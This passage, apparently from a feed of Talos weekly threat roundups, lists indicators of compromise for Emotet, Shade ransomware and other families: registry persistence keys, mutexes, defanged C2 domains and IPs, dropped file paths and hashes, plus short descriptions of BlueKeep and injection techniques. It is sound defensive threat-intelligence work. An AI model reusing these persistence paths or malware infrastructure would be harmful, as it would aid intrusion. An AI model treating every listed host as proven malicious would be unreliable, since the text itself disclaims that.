\n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: steam ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\SCHEDULE\\TASKCACHE\\\\WINDOWS \nValue Name: Id ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\SCHEDULE\\TASKCACHE\\\\WINDOWS \nValue Name: Index ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: NvDisplay ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Windows Defender ` | 1 \nMutexes | Occurrences \n---|--- \n`SwHHcMzPFPnmaghyKW` | 2 \n`ymJAxrWzIz9Lmt1RL3` | 2 \n`UuCyPSySUiFSDdHPtO` | 2 \n`sFWQsTLv8c5vk4jyO0` | 1 \n`tsgtBnaQMyDFZrUQIp` | 1 \n`YsyBq3MBwCzQNk2qhM` | 1 \n`q624fQPLA3sreuCLzt` | 1 \n`N3og1f8lHLVNu6W30c` | 1 \n`KckvHhqL1uihc4dCLw` | 1 \n`RTzXcJcD26j9cGndLe` | 1 \n`9uxtMjacj46ojfxw8Z` | 1 \n`tmiYIVMkI1dD9zfRjT` | 1 \n`hI0uR11aF8XGlij0wp` | 1 \n`fJO2dbxEGn2ZNnVHEj` | 1 \n`zqUBYqdAinRE5xYguS` | 1 \n`RtX4BZD2nWkVu0prSe` | 1 \n`HjjzZQZESOkAInyZch` | 1 \n`cP20H0tkmTiytEkIEL` | 1 \n`ixlUgkBMIocn8A96xU` | 1 \n`yIKLaGMppBM6EDhhvU` | 1 \n`mLvIMV7J1hOyksFGvj` | 1 \n`hj0AV9bM5BIleznxOc` | 1 \n`UQjK2wv6weKFSvAPxM` | 1 \n`UrlxbiSJX7lUOpSRZs` | 1 \n`JsMa39ctmfwcdenPhN` | 1 \n \n*See JSON for more IOCs\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`208[.]95[.]112[.]1` | 52 \n`37[.]8[.]73[.]90` | 2 \n`192[.]69[.]169[.]25` | 1 \n`103[.]43[.]75[.]105` | 1 \n`3[.]14[.]212[.]173` | 1 \n`3[.]19[.]114[.]185` | 1 \n`18[.]188[.]14[.]65` | 1 \n`103[.]136[.]43[.]131` | 1 \n`103[.]73[.]67[.]70` | 1 \n`74[.]118[.]139[.]67` | 1 \n`213[.]183[.]58[.]52` | 1 \n`141[.]255[.]158[.]23` | 1 \n`80[.]66[.]255[.]129` | 1 \n`95[.]59[.]113[.]113` | 1 \n`109[.]230[.]215[.]181` | 1 \n`185[.]248[.]100[.]84` | 1 \n`95[.]156[.]232[.]34` | 1 \n`88[.]150[.]227[.]112` | 1 \n`23[.]249[.]161[.]111` | 1 \n`36[.]84[.]57[.]230` | 1 \n`36[.]84[.]56[.]39` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`ip-api[.]com` | 52 \n`swez111[.]ddns[.]net` | 5 \n`scammer[.]chickenkiller[.]com` | 2 \n`holaholahola[.]hopto[.]org` | 2 \n`chrome[.]giize[.]com` | 2 \n`niroshimax[.]zapto[.]org` | 2 \n`0[.]tcp[.]ngrok[.]io` | 1 \n`gingles[.]ddns[.]net` | 1 \n`dhayan[.]ddns[.]net` | 1 \n`sanchosec[.]ddns[.]net` | 1 \n`apina123[.]duckdns[.]org` | 1 \n`mlks[.]ddns[.]net` | 1 \n`update1337[.]duckdns[.]org` | 1 \n`ord` | 1 \n`dike[.]duckdns[.]org` | 1 \n`nirovitch[.]zapto[.]org` | 1 \n`nume123[.]hopto[.]org` | 1 \n`pilnaspuodas[.]ddns[.]net` | 1 \n`danek56[.]ddns[.]net` | 1 \n`windows13467[.]ddns[.]net` | 1 \n`backtofuture[.]zapto[.]org` | 1 \n`nerdicon[.]ddns[.]net` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\Logs` | 35 \n`%APPDATA%\\Logs\\01-17-2020` | 35 \n`%APPDATA%\\SubDir` | 28 \n`%System32%\\Tasks\\WINDOWSSYSTEMHOST` | 22 \n`%APPDATA%\\SubDir\\Client.exe` | 18 \n`%System32%\\Tasks\\Quasar Client Startup` | 8 \n`%APPDATA%\\<random, matching '[A-Z][a-z]{3,5}\\[a-z]{4,6}'>.exe` | 8 \n`E:\\autorun.inf` | 7 \n`\\autorun.inf` | 7 \n`%System32%\\Tasks\\java` | 4 \n`%APPDATA%\\<random, matching '[a-z0-9]{3,7}'>` | 4 \n`%APPDATA%\\SubDir\\WinUpdate.exe` | 2 \n`%SystemRoot%\\SysWOW64\\java64` | 2 \n`%SystemRoot%\\SysWOW64\\java64\\java.exe` | 2 \n`%System32%\\Tasks\\error pending ` | 2 \n`%APPDATA%\\SubDir\\fileintl.exe` | 2 \n`%System32%\\Tasks\\Windows Defender` | 1 \n`%System32%\\Tasks\\Windows` | 1 \n`%System32%\\Tasks\\Windows startup` | 1 \n`%System32%\\Tasks\\WinSql` | 1 \n`%APPDATA%\\SubDir\\WinSql1.exe` | 1 \n`%System32%\\Tasks\\NET framework` | 1 \n`%ProgramFiles(x86)%\\SubDir` | 1 \n`%ProgramFiles(x86)%\\SubDir\\Client.exe` | 1 \n`%System32%\\Tasks\\RDPBlox Agent` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 02c9df3dec221cacfa6c97e91bee174af3022dac4588e3f494108b0cc5c9fe1e 03fa8b9de359535afb3af2914e2bd91d630b85a0596604501968b12f9187b1da 0624f9670f56e83ab5bbdf903879ffd0facb5b27b4bc53d16f5d4a560033cdf8 0668b26c7ab4e7adbdf98d515b0a58ae06f5e89d67e5c9fa02a9ee7bea8a477a 09666ba370e36246342d7093b6c63b5a8ef10966fa78b79bcf570659a0dd2f77 0c598a620e83a6e0ee892aa5090e2dbbf36dde886620647be8c27bab0b94859e 0ed3feae6696b3986ae492d85fef56e2ec226d7b010154470b433bfc357f861b 189c7ebae4cdd338f844ba5adc3ecc322294a7be438a3a72eea69468ac068eb3 192a0440574068fd9297086e0cf05a57d8ae4af03045d6be4c0b4f21bd636a72 19b8ed7ab551d89467c665ee7f509fe3ece9101679b5302cdc70c6d3a8c12ee6 26f294e691ec271d761a167704d495ca8bdc4d66cb0cd332a0e49313164988b1 27473eaee1e66c3a9581d17b4ff94d481c31f23032b810493d99a23eebee6b22 29f55d706d0e7390d7e77aceae79909654b4868179ff6913f28d78df945a5a51 2b3eb6cf09691b169c603cbeba508c4056eb6c8d1f12abe11b3c11c77b130604 2d3cef89943a95c57418be1996431f9803c6df4a9307d1890a3885c8794986af 3068250bcb0e8ffcee254c2da91e2696703bf36cfb195415aa3b0c454601dad1 3204ad689f3939402dae9670970c55c684b559ce1a8ba5726eb3e143a0beea4a 3622a2b3adfc7cbc7727a7a13dc6c895290c6f6fc93c8e64e753e2041cafed16 362ec0bc0738f083dcdbf9472ebf4e6227b33d093c9dacf1093607fa3b53ea01 38c56bc6885e546caab8faa8f9b75a6b1d82a60f686038ccaf72f148187fb1ee 3baa2fb31a69683a134a24d5a5a05aa1619ce65ba9811e34d254a5efd708580c 42ee0201d3a74bf465daef9178042cc7fb28bab5b932e6d7a865cbc11fce6c94 472736830d9114c83bad680bc95c138d3951213d1429e314749b18083ac5cdf2 4d583b00c74ef261c7c20e53563b521ddda7b85bf5b1ac98463af0c6488a55d0 54b3c135aa1fe9b870209d36e286df1d7dc4e6182b664285f3564c573dbbdc89 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/--j10gGhbFIw/XitQhRzhu3I/AAAAAAAADMA/mfL71YT3qRUdze9uqgfY3fDPm550V_MRQCLcBGAsYHQ/s1600/26f294e691ec271d761a167704d495ca8bdc4d66cb0cd332a0e49313164988b1_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-i2qf-xTBN_I/XitQmZo7OUI/AAAAAAAADME/K8p_3SstFo8SODkhxhMLtTz-l9PZUA7ZACLcBGAsYHQ/s1600/3068250bcb0e8ffcee254c2da91e2696703bf36cfb195415aa3b0c454601dad1_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (8483) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nAtom Bombing code injection technique detected \\- (795) \nA process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. These Atoms are accessible across processes when placed in the global Atom table. Malware exploits this by placing shell code as a global Atom, then accessing it through an Asynchronous Process Call (APC). A target process runs the APC function, which loads and runs the shellcode. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well. \nExcessively long PowerShell command detected \\- (576) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nProcess hollowing detected \\- (288) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nKovter injection detected \\- (264) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nGamarue malware detected \\- (193) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nInstallcore adware detected \\- (90) \nInstall core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nDealply adware detected \\- (61) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \nReverse tcp payload detected \\- (13) \nAn exploit payload intended to connect back to an attacker controlled host using tcp has been detected. \nWinExec payload detected \\- (13) \nAn exploit payload intended to execute commands on an attacker controlled host using WinExec has been detected. \n \n", "cvss3": {}, "published": "2020-01-24T12:58:50", "type": "talosblog", "title": "Threat Roundup for January 17 to January 24", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-0708"], "modified": "2020-01-24T12:58:50", "id": "TALOSBLOG:00DC30A0F4EFA56F4974DF2C3FB23FBB", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/1IoxheLePug/threat-roundup-0117-0124.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-09-27T15:34:10", "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Sept. 20 and Sept. 27. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5d8e0349422a9.txt>)that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness. \nThe most prevalent threats highlighted in this roundup are: \nThreat Name | Type | Description \n---|---|--- \nDoc.Downloader.Emotet-7181535-0 | Downloader | Emotet is a banking trojan that has remained relevant due to its continual evolution to better avoid detection. It is commonly spread via malicious emails. It recently resurfaced after going quiet over the summer of 2019. \nWin.Ransomware.Shade-7178907-1 | Ransomware | Shade, also known as Troldesh, is a ransomware family typically spread via malicious email attachments. \nWin.Dropper.Cerber-7174760-0 | Dropper | Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension \".cerber,\" although in more recent campaigns, this is no longer the case. \nWin.Dropper.Kovter-7173679-0 | Dropper | Kovter is known for it's fileless persistence mechanism. This family of malware creates several malicious registry entries which store its malicious code. Kovter is capable of reinfecting a system even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware. \nWin.Malware.Zusy-7173469-1 | Malware | Zusy, also known as TinyBanker or Tinba, is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as \"explorer.exe\" and \"winver.exe.\" When the user accesses a banking website, it displays a form to trick the user into submitting personal information. \nWin.Packed.Tofsee-7171939-0 | Packed | Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator\u2019s control. \n \n* * *\n\n## Threat Breakdown\n\n### Doc.Downloader.Emotet-7181535-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCR>\\INTERFACE\\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} ` | 31 \n`<HKCR>\\WOW6432NODE\\INTERFACE\\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} ` | 31 \n`<HKCR>\\INTERFACE\\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} ` | 31 \n`<HKCR>\\WOW6432NODE\\INTERFACE\\{8BD21D32-EC42-11CE-9E0D-00AA006002F3} ` | 31 \n`<HKCR>\\INTERFACE\\{8BD21D32-EC42-11CE-9E0D-00AA006002F3} ` | 31 \n`<HKCR>\\WOW6432NODE\\INTERFACE\\{8BD21D42-EC42-11CE-9E0D-00AA006002F3} ` | 31 \n`<HKCR>\\INTERFACE\\{8BD21D42-EC42-11CE-9E0D-00AA006002F3} ` | 31 \n`<HKCR>\\WOW6432NODE\\INTERFACE\\{8BD21D52-EC42-11CE-9E0D-00AA006002F3} ` | 31 \n`<HKCR>\\INTERFACE\\{8BD21D52-EC42-11CE-9E0D-00AA006002F3} ` | 31 \n`<HKCR>\\WOW6432NODE\\INTERFACE\\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} ` | 31 \n`<HKCR>\\INTERFACE\\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} ` | 31 \n`<HKCR>\\WOW6432NODE\\INTERFACE\\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} ` | 31 \n`<HKCR>\\INTERFACE\\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} ` | 31 \n`<HKCR>\\WOW6432NODE\\INTERFACE\\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F} ` | 31 \n`<HKCR>\\INTERFACE\\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F} ` | 31 \n`<HKCR>\\WOW6432NODE\\INTERFACE\\{4C5992A5-6926-101B-9992-00000B65C6F9} ` | 31 \n`<HKCR>\\INTERFACE\\{4C5992A5-6926-101B-9992-00000B65C6F9} ` | 31 \n`<HKCR>\\WOW6432NODE\\INTERFACE\\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D} ` | 31 \n`<HKCR>\\INTERFACE\\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D} ` | 31 \n`<HKCR>\\WOW6432NODE\\INTERFACE\\{47FF8FE0-6198-11CF-8CE8-00AA006CB389} ` | 31 \n`<HKCR>\\INTERFACE\\{47FF8FE0-6198-11CF-8CE8-00AA006CB389} ` | 31 \n`<HKCR>\\WOW6432NODE\\INTERFACE\\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} ` | 31 \n`<HKCR>\\INTERFACE\\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} ` | 31 \n`<HKCR>\\WOW6432NODE\\INTERFACE\\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} ` | 31 \n`<HKCR>\\INTERFACE\\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} ` | 31 \nMutexes | Occurrences \n---|--- \n`Global\\I98B68E3C` | 31 \n`Global\\M98B68E3C` | 31 \n`5CAC3FAB-87F0-4750-984D-D50144543427-VER15` | 2 \n`Local\\{F99C425F-9135-43ed-BD7D-396DE488DC53}` | 2 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`74[.]208[.]236[.]145` | 31 \n`190[.]158[.]19[.]141` | 27 \n`139[.]5[.]237[.]27` | 27 \n`5[.]45[.]108[.]146` | 8 \n`86[.]109[.]99[.]70/31` | 8 \n`17[.]36[.]205[.]74` | 7 \n`173[.]194[.]68[.]108/31` | 7 \n`195[.]114[.]1[.]181` | 7 \n`82[.]223[.]190[.]138/31` | 7 \n`181[.]123[.]0[.]125` | 7 \n`80[.]94[.]2[.]233` | 7 \n`217[.]116[.]0[.]237` | 6 \n`62[.]149[.]157[.]55` | 6 \n`195[.]20[.]225[.]171` | 6 \n`173[.]194[.]175[.]108/31` | 5 \n`201[.]214[.]74[.]71` | 5 \n`212[.]227[.]15[.]158` | 4 \n`182[.]50[.]144[.]84` | 4 \n`193[.]70[.]18[.]144` | 4 \n`193[.]17[.]41[.]99` | 4 \n`212[.]227[.]15[.]142` | 4 \n`162[.]210[.]102[.]199` | 4 \n`212[.]227[.]15[.]135` | 4 \n`217[.]116[.]0[.]228` | 4 \n`62[.]149[.]128[.]42` | 4 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`otc-manila[.]com` | 31 \n`smtp[.]mail[.]me[.]com` | 7 \n`smtp[.]movistar[.]es` | 7 \n`mail[.]tradeus[.]eu` | 7 \n`mail[.]serviciodecorreo[.]es` | 6 \n`smtp[.]1and1[.]es` | 6 \n`imap[.]1und1[.]de` | 6 \n`smtp[.]serviciodecorreo[.]es` | 6 \n`mail[.]aruba[.]it` | 6 \n`mail[.]ionos[.]es` | 6 \n`mail[.]gwiazdeczka[.]pl` | 6 \n`smtp[.]outlook[.]com` | 5 \n`pop-mail[.]outlook[.]com` | 5 \n`smtpout[.]secureserver[.]net` | 5 \n`smtp[.]1und1[.]de` | 5 \n`imap[.]serviciodecorreo[.]es` | 5 \n`mail[.]zenithexperience[.]es` | 5 \n`mail[.]comcast[.]net` | 4 \n`mail[.]1und1[.]de` | 4 \n`pop[.]asia[.]secureserver[.]net` | 4 \n`smtp[.]orange[.]fr` | 4 \n`ssl0[.]ovh[.]net` | 4 \n`poczta[.]o2[.]pl` | 4 \n`smtp[.]aruba[.]it` | 4 \n`mbox[.]freehostia[.]com` | 4 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\657.exe` | 31 \n`\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\CLSID\\{8BD21D10-EC42-11CE-9E0D-00AA006002F3}` | 1 \n`%SystemRoot%\\SysWOW64\\gcycF3Sb1.exe` | 1 \n`%SystemRoot%\\SysWOW64\\qoOwTVXh.exe` | 1 \n`%SystemRoot%\\SysWOW64\\gMVKv3.exe` | 1 \n`%TEMP%\\CVRF2C.tmp` | 1 \n`%TEMP%\\CVRB39.tmp` | 1 \n`%TEMP%\\CVRDF3.tmp` | 1 \n \n#### File Hashes\n\n` 075a45f9c68a9f5af201e7863394c91cf5a1f939d2a6b21fbd9c749c0a10696f 291a9820bceb930a4106c341c6bb37f2242b5ca0c653923db92dcac50d9c953f 2926d350ee2037949c36a19aca959b8404626f09d32bf930cf9b218424f7cf27 2991af9ecbba0ae304f43ab19ba172ef2ff18345b5fd8f7abc4bc4e2b0a775b3 2a078275cdeb69e448bd7cea359ce34c05ab028713357df0b70448dcdb9f8f0c 3e390763b85cd1322e1fe528ab15923df480ce1f2dabff373bfc67ed8d0d5aa7 5855ccd73204841b2e32d2cd93598ef8b5e0698abc5a8cea26b7e14b279a7448 5a8c51d22698e05215e2f3fdc50a14342fb3108acf6bde761c87d9ae2106d5d1 5c221d09b195901d9435a897f131cb06b9c88bc24d34f7effe2168a66bf935cc 6a8beeef74251f9d91d1965649cabfd7f9840e4ba63259c91c8ecd9020cdda45 6bf59378b0897e410d4d9faa0a23d22e6e96ebedbe3d543338d1f9f3d9c3f21a 742719dfdde109a1cff437941a1f14d8eb3a844a22da6c010d09b835366bb2dd 777d585b5e7e30bce1d8e8e343a007e9d0b6e4f45afa9f415b3fb8b3296a50f0 77d0c4316554e2f7c78b7554f0d067c210c242cb0150a8a1aa3ab4b0d6ccc9df 7a375d0966ac0053e566827ddd3a6c9d2f8251f2a754f0502a61a89f98a94ea9 83f74cedc1e06f0b2377df8d41e67ed0273948888705fbe391e1d82849c54330 8ce63dc6baa9a80c3913d462bdb19fc1bc1ba635bde1d5a6c26fc5f7cf325ea4 a44828c3d4266e7b6518fb6be06907d6d9de2c48546d7ea2c73c2fed3f3fa75c a88780c026c4094e0580a2ab21118b96dab08e00d1935bd6fae2946fd81bdb03 b1d366a828f6eb91a08dd023aa98f2b8b9737497eff937e2d169e5a6b6377d25 b637cedefc7244a8a84bede6eb7733803744f4ac140ed368da9a64c06e98dc28 ba3f8c880453fc3cd667709325895c93cfe6a1e371456c58336e6bb7455668dc c19c5960f37853a5f2db86cc749593dd98b124ddd21d39b8ca53c921389a0bd6 c4c30e304d232b9b5cf276d9534675dff3a541ee41b271fed54a37b3f1fd9aef cbb3ac37b40296794f6f30dd6efc2a9cb3cc35f2438b8ba89f14b58971e14d26 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-F-aTMdaViLU/XY4EsXg43MI/AAAAAAAACrk/aazt2PU14CE-P0Rj-Ive_e1xKQ7rB-6kwCLcBGAsYHQ/s1600/c19c5960f37853a5f2db86cc749593dd98b124ddd21d39b8ca53c921389a0bd6_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-JUvwhqYZ8mA/XY4Ex2eLkoI/AAAAAAAACro/Qev9GBNC9-ISHV-9QkpYIGq1okx5LP1wgCLcBGAsYHQ/s1600/ef024581b1f33f3cef5ad61bb01d905799300116b20ea7b71d782ad00d307a5f_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-vWdgVvobMQ4/XY4E5FhmEAI/AAAAAAAACrs/uoh8fRsy3FA3JMMw4J-O0Vz40DLh7czfQCLcBGAsYHQ/s1600/291a9820bceb930a4106c341c6bb37f2242b5ca0c653923db92dcac50d9c953f_umbrella.png>)\n\n \n\n\n#### Malware\n\n[](<https://1.bp.blogspot.com/-2g7Q2cV8DTg/XY4FIAtGVDI/AAAAAAAACr4/B-42HMY_N6ou-6NJxunL1xMBOFEaGQzRgCLcBGAsYHQ/s1600/7a375d0966ac0053e566827ddd3a6c9d2f8251f2a754f0502a61a89f98a94ea9_malware.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Ransomware.Shade-7178907-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xi ` | 155 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Client Server Runtime Subsystem ` | 155 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xVersion ` | 155 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32 ` | 154 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION ` | 154 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xmode ` | 76 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xpk ` | 76 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xstate ` | 76 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: shst ` | 75 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: sh1 ` | 75 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: shsnt ` | 73 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER \nValue Name: CleanShutdown ` | 36 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APPLETS\\SYSTRAY \nValue Name: Services ` | 26 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\TELEPHONY \nValue Name: DomainName ` | 13 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\TELEPHONY \nValue Name: TAPISRVSCPGUID ` | 13 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\SYSTEM32\\CONFIGURATION \nValue Name: xmail ` | 9 \nMutexes | Occurrences \n---|--- \n`GeneratingSchemaGlobalMapping` | 64 \n`cversions.2.m` | 35 \n`Global\\47348ae1-defe-11e9-a007-00501e3ae7b5` | 1 \n`Global\\f1f16ad1-df02-11e9-a007-00501e3ae7b5` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`66[.]171[.]248[.]178` | 75 \n`128[.]31[.]0[.]39` | 57 \n`208[.]83[.]223[.]34` | 56 \n`194[.]109[.]206[.]212` | 53 \n`154[.]35[.]32[.]5` | 52 \n`76[.]73[.]17[.]194` | 51 \n`171[.]25[.]193[.]9` | 50 \n`193[.]23[.]244[.]244` | 46 \n`86[.]59[.]21[.]38` | 46 \n`131[.]188[.]40[.]188/31` | 46 \n`132[.]148[.]98[.]116` | 19 \n`79[.]98[.]28[.]28` | 13 \n`198[.]187[.]29[.]35` | 11 \n`173[.]236[.]177[.]100` | 8 \n`162[.]216[.]45[.]5` | 6 \n`46[.]105[.]57[.]169` | 5 \n`198[.]54[.]120[.]231` | 5 \n`94[.]23[.]64[.]3` | 5 \n`13[.]107[.]21[.]200` | 4 \n`204[.]79[.]197[.]200` | 4 \n`5[.]9[.]158[.]75` | 4 \n`23[.]6[.]22[.]189` | 4 \n`145[.]239[.]6[.]188/31` | 4 \n`47[.]101[.]49[.]13` | 4 \n`66[.]33[.]211[.]13` | 4 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`ipv4bot[.]whatismyipaddress[.]com` | 75 \n`api[.]w[.]org` | 12 \n`gmpg[.]org` | 7 \n`www[.]breilginestet[.]fr` | 5 \n`getjobportal[.]com` | 5 \n`saschoolsphotography[.]co[.]za` | 5 \n`www[.]loudgraphicsonline[.]com` | 5 \n`login[.]microsoftonline[.]com` | 4 \n`filesextension[.]com` | 4 \n`www[.]solvusoft[.]com` | 4 \n`shell[.]windows[.]com` | 4 \n`fileinfo[.]com` | 4 \n`openfile[.]club` | 4 \n`file[.]org` | 4 \n`www[.]techwalla[.]com` | 4 \n`opentmpfile[.]com` | 4 \n`freeformmanagementco[.]com` | 4 \n`manosapnas[.]lt` | 4 \n`www[.]wuyufeng[.]cn` | 4 \n`jdcontractingomaha[.]com` | 4 \n`www[.]lalogarcia[.]es` | 4 \n`www[.]mobiadnews[.]com` | 4 \n`paulbacinodentistry[.]com` | 4 \n`levente[.]biz[.]pk` | 4 \n`www[.]anniechase[.]com` | 4 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%ProgramData%\\Windows\\csrss.exe` | 155 \n`%ProgramData%\\Windows` | 154 \n`%TEMP%\\6893A5D897` | 154 \n`\\README1.txt` | 76 \n`\\README10.txt` | 76 \n`\\README2.txt` | 76 \n`\\README3.txt` | 76 \n`\\README4.txt` | 76 \n`\\README5.txt` | 76 